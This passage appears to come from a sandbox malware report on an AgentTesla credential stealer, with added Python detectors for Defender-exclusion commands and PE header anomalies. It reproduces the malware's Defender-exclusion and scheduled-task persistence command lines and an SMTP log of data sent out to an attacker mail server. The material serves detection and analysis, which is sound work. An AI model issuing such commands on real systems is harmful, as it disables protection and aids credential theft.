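    "PS>Add-MpPreference -ExclusionPath C:\\Users\\user\\AppData\\Roaming\\UlhpAjSuVoTa.exe",
])

# Add-MpPreference -ExclusionPath | -ExclusionProcess | -ExclusionExtension <value>
EXCLUSION_RE = re.compile(
    r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+(\"[^\"]*\"|'[^']*'|\S+)",
    re.IGNORECASE,
)
# Locations an unprivileged user can write to (this example's list); an exclusion
# there shields a dropper rather than a legitimately installed product.
USER_WRITABLE_RE = re.compile(
    r"^[A-Za-z]:\\(Users\\[^\\]+\\(AppData|Desktop|Documents|Downloads)|ProgramData|Windows\\Temp|Temp)(\\|$)",
    re.IGNORECASE,
)


def header_field(transcript, name):
    """Value of a 'Name: value' line in the transcript header, or None if absent."""
    m = re.search(rf"^{re.escape(name)}: (.*)$", transcript, re.MULTILINE)
    return m.group(1).strip() if m else None


def find_exclusions(transcript):
    """Distinct exclusions in order of appearance (the Host Application line and the
    PS> echo of the same command count once)."""
    seen, out = set(), []
    for m in EXCLUSION_RE.finditer(transcript):
        kind, value = m.group(1).capitalize(), m.group(2).strip("\"'")
        key = (kind.lower(), value.lower())
        if key in seen:
            continue
        seen.add(key)
        out.append({
            "kind": kind,
            "value": value,
            "user_writable": kind == "Path" and bool(USER_WRITABLE_RE.match(value)),
        })
    return out


def alerts(transcript):
    """One alert line per exclusion, carrying the identity fields an analyst needs."""
    who = header_field(transcript, "RunAs User")
    pid = header_field(transcript, "Process ID")
    host = header_field(transcript, "Machine")
    lines = []
    for ex in find_exclusions(transcript):
        sev = "high" if ex["user_writable"] else "medium"
        lines.append(f"[{sev}] {host}: pid {pid} ({who}) excluded {ex['kind']} "
                     f"{ex['value']} from Defender")
    return lines
```

Two details of the transcript are worth reading alongside the output. The Host Application path says C:\Windows\System32\...\powershell.exe while the report lists the process as C:\Windows\SysWOW64\...\powershell.exe: the 32-bit sample launched PowerShell under WOW64 file-system redirection, so the transcript's path is what the caller asked for, not what ran. And the command appears twice (once in the header, once after the PS> prompt), which is why the parser deduplicates.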

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.814013296316778
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:winlogon.exe
                                                                        File size:473600
                                                                        MD5:629f5bb8b5ee75e90c393ad9d96a1772
                                                                        SHA1:b09925a7163bef858657a1b39146fe27abb01f99
                                                                        SHA256:15637f2d530662c968272c1e6e48ca6a093f0c828edf0cbb5cd32d9af03b3ff5
                                                                        SHA512:3434c0b1f42533c42a4232809a007ddfd340ebc0d500db436cd038e3d3b4aaf0fd8bcf36e3a1cee4442c5d894679f5cdc7cef5a90c04534f937121d6cc9e3857
                                                                        SSDEEP:12288:Tu39J++7isfbzaXkpbWiVSDZynHjqRpfJ2Wfi/Srws:TutJ++7lzzkCUZSHjqff9fi6r
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....hO...............0..0...........N... ...`....@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:00828e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x474ec6
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                        Time Stamp:0xE54F68FF [Thu Nov 29 14:58:07 2091 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:v4.0.30319
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated 97 times in the preview: the bytes after the six-byte jmp stub are all 00 00, which disassembles to this instruction)

                                                                        Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x74e74          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x76000          0x514         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x78000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x74e58          0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                        Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x72ecc       0x73000   False     0.893866762908   data       7.82547153814   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x76000          0x514         0x600     False     0.3828125        data       3.82946279488   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x78000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

Name         RVA      Size   Type                                                                       Language  Country
RT_VERSION   0x76090  0x284  data
RT_MANIFEST  0x76324  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                        Imports

DLL          Import
mscoree.dll  _CorExeMain

                                                                        Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright
Assembly Version  0.0.0.0
InternalName      CancellationCallbackIn.exe
FileVersion       0.0.0.0
ProductVersion    0.0.0.0
FileDescription
OriginalFilename  CancellationCallbackIn.exe
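The static tables above carry several facts an analyst checks by hand before opening the binary: a link timestamp in the year 2091, an entrypoint a few bytes before the end of .text, a .text section with entropy close to 8 and a single native import. The following is an added example, not part of the Joe Sandbox report, that encodes those checks. The constants are copied from the Static PE Info, Entrypoint Preview, Data Directories, Sections and Imports tables; ENTRY_STUB is the byte encoding reconstructed from the preview's first mnemonic (FF 25 imm32 is the 32-bit encoding of jmp dword ptr [imm32]); the entropy threshold, the heuristics and the finding texts are this example's own choices.

```python
"""Header sanity checks on the static PE facts reported for winlogon.exe.

Added example, not part of the Joe Sandbox report. Constants are copied from
the report's static tables; ENTRY_STUB is reconstructed from the mnemonic
shown in the Entrypoint Preview; thresholds and finding texts are this
example's own.
"""
from datetime import datetime, timezone

IMAGE_BASE = 0x400000
ENTRYPOINT_VA = 0x474EC6
TIMESTAMP = 0xE54F68FF                        # IMAGE_FILE_HEADER.TimeDateStamp
IAT_RVA, IAT_SIZE = 0x2000, 0x8               # IMAGE_DIRECTORY_ENTRY_IAT
COM_DESCRIPTOR_RVA = 0x2008                   # non-zero: CLR header present
ENTRY_STUB = bytes.fromhex("ff2500204000")    # jmp dword ptr [00402000h]
SECTIONS = {
    # name: (virtual address, virtual size, raw size, executable?, entropy)
    ".text":  (0x2000,  0x72ECC, 0x73000, True,  7.82547153814),
    ".rsrc":  (0x76000, 0x514,   0x600,   False, 3.82946279488),
    ".reloc": (0x78000, 0xC,     0x200,   False, 0.101910425663),
}
IMPORTS = {"mscoree.dll": ["_CorExeMain"]}
HIGH_ENTROPY = 7.0                            # bits per byte; this example's threshold


def pe_timestamp(ts):
    """Decode TimeDateStamp: seconds since 1970-01-01 00:00:00 UTC."""
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def section_for_rva(rva, sections=SECTIONS):
    """Name of the section whose virtual range contains rva, or None."""
    for name, (va, vsize, _raw, _exec, _ent) in sections.items():
        if va <= rva < va + vsize:
            return name
    return None


def jmp_indirect_target(stub):
    """Operand of FF 25 imm32 (jmp dword ptr [imm32]): the address of the slot read."""
    if len(stub) < 6 or stub[:2] != b"\xff\x25":
        raise ValueError("not a jmp dword ptr [imm32] stub")
    return int.from_bytes(stub[2:6], "little")


def triage(now=None):
    """Apply the header heuristics and return human-readable findings."""
    now = now or datetime.now(timezone.utc)
    findings = []

    built = pe_timestamp(TIMESTAMP)
    if built > now:
        findings.append(f"timestamp: link time {built:%Y-%m-%d %H:%M:%S} UTC is in the future, "
                        "so it was forged or randomised and cannot date the build")

    ep_rva = ENTRYPOINT_VA - IMAGE_BASE
    sec = section_for_rva(ep_rva)
    if sec is None:
        findings.append(f"entrypoint: RVA {ep_rva:#x} lies outside every section")
    else:
        va, vsize = SECTIONS[sec][:2]
        findings.append(f"entrypoint: RVA {ep_rva:#x} in {sec}, {va + vsize - ep_rva} bytes before its end")

    target = jmp_indirect_target(ENTRY_STUB)
    if IMAGE_BASE + IAT_RVA <= target < IMAGE_BASE + IAT_RVA + IAT_SIZE:
        findings.append(f"entrypoint: stub jumps through the IAT slot at {target:#x} "
                        "(native stub handing control to _CorExeMain)")

    for name, (_va, _vsize, _raw, executable, entropy) in SECTIONS.items():
        if executable and entropy > HIGH_ENTROPY:
            findings.append(f"{name}: entropy {entropy:.2f} in a code section points at packed "
                            "or encrypted content rather than plain IL")

    if set(IMPORTS) == {"mscoree.dll"} and COM_DESCRIPTOR_RVA:
        findings.append("imports: only mscoree!_CorExeMain, so the API use lives in IL; "
                        "decompile the assembly rather than reading the import table")
    return findings
```

Running triage() reproduces the report's bracketed date for the timestamp and shows that the entrypoint RVA 0x74ec6 sits exactly six bytes before the end of .text, the length of the jmp stub, which is why the rest of the Entrypoint Preview is zero padding. The high-entropy .text together with the tiny import table is the usual profile of an obfuscated .NET loader: the native header tells you almost nothing, and the behaviour reported above (process injection, Defender exclusion, SMTP exfil) comes from the IL and whatever it unpacks at run time.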

                                                                        Network Behavior

                                                                        Snort IDS Alerts

Timestamp                 Protocol  SID      Message                              Source Port  Dest Port  Source IP    Dest IP
12/02/21-20:23:48.879737  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49843        587        192.168.2.4  208.91.199.224

                                                                        Network Port Distribution

                                                                        TCP Packets

Timestamp                           Source Port  Dest Port  Source IP       Dest IP
Dec 2, 2021 20:23:47.537733078 CET  49843        587        192.168.2.4     208.91.199.224
Dec 2, 2021 20:23:47.687623024 CET  587          49843      208.91.199.224  192.168.2.4
Dec 2, 2021 20:23:47.690627098 CET  49843        587        192.168.2.4     208.91.199.224
Dec 2, 2021 20:23:47.924026012 CET  587          49843      208.91.199.224  192.168.2.4
Dec 2, 2021 20:23:47.924518108 CET  49843        587        192.168.2.4     208.91.199.224
Dec 2, 2021 20:23:48.074357986 CET  587          49843      208.91.199.224  192.168.2.4
Dec 2, 2021 20:23:48.074382067 CET  587          49843      208.91.199.224  192.168.2.4
Dec 2, 2021 20:23:48.075438023 CET  49843        587        192.168.2.4     208.91.199.224
Dec 2, 2021 20:23:48.226380110 CET  587          49843      208.91.199.224  192.168.2.4
Dec 2, 2021 20:23:48.226877928 CET  49843        587        192.168.2.4     208.91.199.224
Dec 2, 2021 20:23:48.378978014 CET  587          49843      208.91.199.224  192.168.2.4
Dec 2, 2021 20:23:48.379654884 CET  49843        587        192.168.2.4     208.91.199.224
Dec 2, 2021 20:23:48.530858040 CET  587          49843      208.91.199.224  192.168.2.4
Dec 2, 2021 20:23:48.531563044 CET  49843        587        192.168.2.4     208.91.199.224
Dec 2, 2021 20:23:48.721369982 CET  587          49843      208.91.199.224  192.168.2.4
Dec 2, 2021 20:23:48.727202892 CET  587          49843      208.91.199.224  192.168.2.4
Dec 2, 2021 20:23:48.727817059 CET  49843        587        192.168.2.4     208.91.199.224
Dec 2, 2021 20:23:48.877969027 CET  587          49843      208.91.199.224  192.168.2.4
Dec 2, 2021 20:23:48.878220081 CET  587          49843      208.91.199.224  192.168.2.4
Dec 2, 2021 20:23:48.879736900 CET  49843        587        192.168.2.4     208.91.199.224
Dec 2, 2021 20:23:48.879857063 CET  49843        587        192.168.2.4     208.91.199.224
Dec 2, 2021 20:23:48.880605936 CET  49843        587        192.168.2.4     208.91.199.224
Dec 2, 2021 20:23:48.880714893 CET  49843        587        192.168.2.4     208.91.199.224
Dec 2, 2021 20:23:49.029740095 CET  587          49843      208.91.199.224  192.168.2.4
Dec 2, 2021 20:23:49.030546904 CET  587          49843      208.91.199.224  192.168.2.4
Dec 2, 2021 20:23:49.086833000 CET  587          49843      208.91.199.224  192.168.2.4
Dec 2, 2021 20:23:49.137166977 CET  49843        587        192.168.2.4     208.91.199.224

                                                                        UDP Packets

Timestamp                           Source Port  Dest Port  Source IP    Dest IP
Dec 2, 2021 20:23:47.315831900 CET  51726        53         192.168.2.4  8.8.8.8
Dec 2, 2021 20:23:47.468144894 CET  53           51726      8.8.8.8      192.168.2.4
Dec 2, 2021 20:23:47.502657890 CET  56794        53         192.168.2.4  8.8.8.8
Dec 2, 2021 20:23:47.522454023 CET  53           56794      8.8.8.8      192.168.2.4

                                                                        DNS Queries

Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name                  Type            Class
Dec 2, 2021 20:23:47.315831900 CET  192.168.2.4  8.8.8.8  0xd9fa    Standard query (0)  smtp.stockmeieir.com  A (IP address)  IN (0x0001)
Dec 2, 2021 20:23:47.502657890 CET  192.168.2.4  8.8.8.8  0x53fb    Standard query (0)  smtp.stockmeieir.com  A (IP address)  IN (0x0001)

                                                                        DNS Answers

Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name                      CName / Address           Type                    Class
Dec 2, 2021 20:23:47.468144894 CET  8.8.8.8    192.168.2.4  0xd9fa    No error (0)  smtp.stockmeieir.com      us2.smtp.mailhostbox.com  CNAME (Canonical name)  IN (0x0001)
Dec 2, 2021 20:23:47.468144894 CET  8.8.8.8    192.168.2.4  0xd9fa    No error (0)  us2.smtp.mailhostbox.com  208.91.199.224            A (IP address)          IN (0x0001)
Dec 2, 2021 20:23:47.468144894 CET  8.8.8.8    192.168.2.4  0xd9fa    No error (0)  us2.smtp.mailhostbox.com  208.91.199.225            A (IP address)          IN (0x0001)
Dec 2, 2021 20:23:47.468144894 CET  8.8.8.8    192.168.2.4  0xd9fa    No error (0)  us2.smtp.mailhostbox.com  208.91.198.143            A (IP address)          IN (0x0001)
Dec 2, 2021 20:23:47.468144894 CET  8.8.8.8    192.168.2.4  0xd9fa    No error (0)  us2.smtp.mailhostbox.com  208.91.199.223            A (IP address)          IN (0x0001)
Dec 2, 2021 20:23:47.522454023 CET  8.8.8.8    192.168.2.4  0x53fb    No error (0)  smtp.stockmeieir.com      us2.smtp.mailhostbox.com  CNAME (Canonical name)  IN (0x0001)
Dec 2, 2021 20:23:47.522454023 CET  8.8.8.8    192.168.2.4  0x53fb    No error (0)  us2.smtp.mailhostbox.com  208.91.199.224            A (IP address)          IN (0x0001)
Dec 2, 2021 20:23:47.522454023 CET  8.8.8.8    192.168.2.4  0x53fb    No error (0)  us2.smtp.mailhostbox.com  208.91.199.225            A (IP address)          IN (0x0001)
Dec 2, 2021 20:23:47.522454023 CET  8.8.8.8    192.168.2.4  0x53fb    No error (0)  us2.smtp.mailhostbox.com  208.91.198.143            A (IP address)          IN (0x0001)
Dec 2, 2021 20:23:47.522454023 CET  8.8.8.8    192.168.2.4  0x53fb    No error (0)  us2.smtp.mailhostbox.com  208.91.199.223            A (IP address)          IN (0x0001)

                                                                        SMTP Packets

                                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                                        Dec 2, 2021 20:23:47.924026012 CET | 587 | 49843 | 208.91.199.224 | 192.168.2.4 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                        Dec 2, 2021 20:23:47.924518108 CET | 49843 | 587 | 192.168.2.4 | 208.91.199.224 | EHLO 506013
                                                                        Dec 2, 2021 20:23:48.074382067 CET | 587 | 49843 | 208.91.199.224 | 192.168.2.4 | 250-us2.outbound.mailhostbox.com
                                                                                                                                                                  250-PIPELINING
                                                                                                                                                                  250-SIZE 41648128
                                                                                                                                                                  250-VRFY
                                                                                                                                                                  250-ETRN
                                                                                                                                                                  250-STARTTLS
                                                                                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                                                                                  250-AUTH=PLAIN LOGIN
                                                                                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                                                                                  250-8BITMIME
                                                                                                                                                                  250 DSN
                                                                        Dec 2, 2021 20:23:48.075438023 CET | 49843 | 587 | 192.168.2.4 | 208.91.199.224 | AUTH login bS5tZWxlbmRlekBzdG9ja21laWVpci5jb20=
                                                                        Dec 2, 2021 20:23:48.226380110 CET | 587 | 49843 | 208.91.199.224 | 192.168.2.4 | 334 UGFzc3dvcmQ6
                                                                        Dec 2, 2021 20:23:48.378978014 CET | 587 | 49843 | 208.91.199.224 | 192.168.2.4 | 235 2.7.0 Authentication successful
                                                                        Dec 2, 2021 20:23:48.379654884 CET | 49843 | 587 | 192.168.2.4 | 208.91.199.224 | MAIL FROM:<m.melendez@stockmeieir.com>
                                                                        Dec 2, 2021 20:23:48.530858040 CET | 587 | 49843 | 208.91.199.224 | 192.168.2.4 | 250 2.1.0 Ok
                                                                        Dec 2, 2021 20:23:48.531563044 CET | 49843 | 587 | 192.168.2.4 | 208.91.199.224 | RCPT TO:<m.melendez@stockmeieir.com>
                                                                        Dec 2, 2021 20:23:48.727202892 CET | 587 | 49843 | 208.91.199.224 | 192.168.2.4 | 250 2.1.5 Ok
                                                                        Dec 2, 2021 20:23:48.727817059 CET | 49843 | 587 | 192.168.2.4 | 208.91.199.224 | DATA
                                                                        Dec 2, 2021 20:23:48.878220081 CET | 587 | 49843 | 208.91.199.224 | 192.168.2.4 | 354 End data with <CR><LF>.<CR><LF>
                                                                        Dec 2, 2021 20:23:48.880714893 CET | 49843 | 587 | 192.168.2.4 | 208.91.199.224 | .
                                                                        Dec 2, 2021 20:23:49.086833000 CET | 587 | 49843 | 208.91.199.224 | 192.168.2.4 | 250 2.0.0 Ok: queued as 9D30E2C7C12

                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        System Behavior

                                                                        General

                                                                        Start time:20:22:06
                                                                        Start date:02/12/2021
                                                                        Path:C:\Users\user\Desktop\winlogon.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\winlogon.exe"
                                                                        Imagebase:0x7d0000
                                                                        File size:473600 bytes
                                                                        MD5 hash:629F5BB8B5EE75E90C393AD9D96A1772
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.676484155.0000000002CB3000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.678289324.0000000003BD9000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.678289324.0000000003BD9000.00000004.00000001.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        General

                                                                        Start time:20:22:09
                                                                        Start date:02/12/2021
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe
                                                                        Imagebase:0xa40000
                                                                        File size:430592 bytes
                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:high

                                                                        General

                                                                        Start time:20:22:10
                                                                        Start date:02/12/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff724c50000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:20:22:10
                                                                        Start date:02/12/2021
                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" /XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp
                                                                        Imagebase:0x150000
                                                                        File size:185856 bytes
                                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:20:22:11
                                                                        Start date:02/12/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff724c50000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:20:22:12
                                                                        Start date:02/12/2021
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Imagebase:0x620000
                                                                        File size:45152 bytes
                                                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.673745105.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.673745105.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.928192822.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.928192822.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.672598413.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.672598413.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.672988393.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.672988393.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.929157483.00000000029B4000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.673339643.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.673339643.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        Reputation:high

                                                                        Disassembly

                                                                        Code Analysis